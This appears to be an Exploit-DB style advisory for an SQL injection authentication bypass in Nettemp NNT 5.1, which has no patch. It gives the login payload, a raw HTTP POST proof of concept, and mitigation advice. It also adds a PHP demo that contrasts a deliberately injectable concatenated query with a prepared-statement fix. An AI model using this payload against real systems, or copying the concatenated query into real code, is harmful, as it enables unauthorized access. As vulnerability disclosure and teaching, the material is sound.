Vendor: NNT
By: Momen Eldawakhly
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: NNT
Affected Version From: 5.1
Affected Version To: 5.1
Patch Exists: NO
Related CWE:
CPE: a:nettemp:nnt:5.1
Metasploit:
Other Scripts:
Platforms Tested: Linux (Ubuntu 20.04)
2021

Nettmp NNT 5.1 – SQLi Authentication Bypass

An attacker can bypass authentication by sending a crafted username and password in a POST request to the vulnerable application's login form. With the username set to 1' or 1=1;-- and the password set to \ (the payload shown in the raw data below), the injected condition bypasses the authentication check and gives the attacker access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
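
Filtering alone is fragile; the standard fix for CWE-89 is to bind request fields as query parameters. The following is an added example, not nettemp's code and not part of the original advisory: a constructed users table and hypothetical login_concat / login_prepared functions in PHP (PDO, in-memory SQLite), run against the username and password from the proof of concept on this page.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's user
// table (assumption: the real schema is not shown in the advisory).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (login TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (login, pw_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Weak form (hypothetical): request fields are concatenated into the SQL
// text, so a quote in the username changes the structure of the WHERE clause.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT login FROM users WHERE login = '$user' AND pw_hash = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened form: the username is bound as data, and the password is checked
// against the stored hash in PHP instead of inside the query.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE login = :login');
    $stmt->execute([':login' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Field values taken from the proof of concept on this page.
$user = "1' or 1=1;--";
$pass = '\\';

echo "concatenated query, PoC values: ";
var_dump(login_concat($db, $user, $pass));
echo "prepared statement, PoC values: ";
var_dump(login_prepared($db, $user, $pass));
echo "prepared statement, valid login: ";
var_dump(login_prepared($db, 'admin', 'correct horse'));
```

Run it with the PHP CLI and the pdo_sqlite extension enabled; the three lines compare how each login function treats the same input.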

Exploit-DB raw data:

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)

Payload:

username: 1' or 1=1;--
password: \

Proof of Concept:

POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1

username=1%27+or+1%3D1%3B--&password=%5C&form_login=log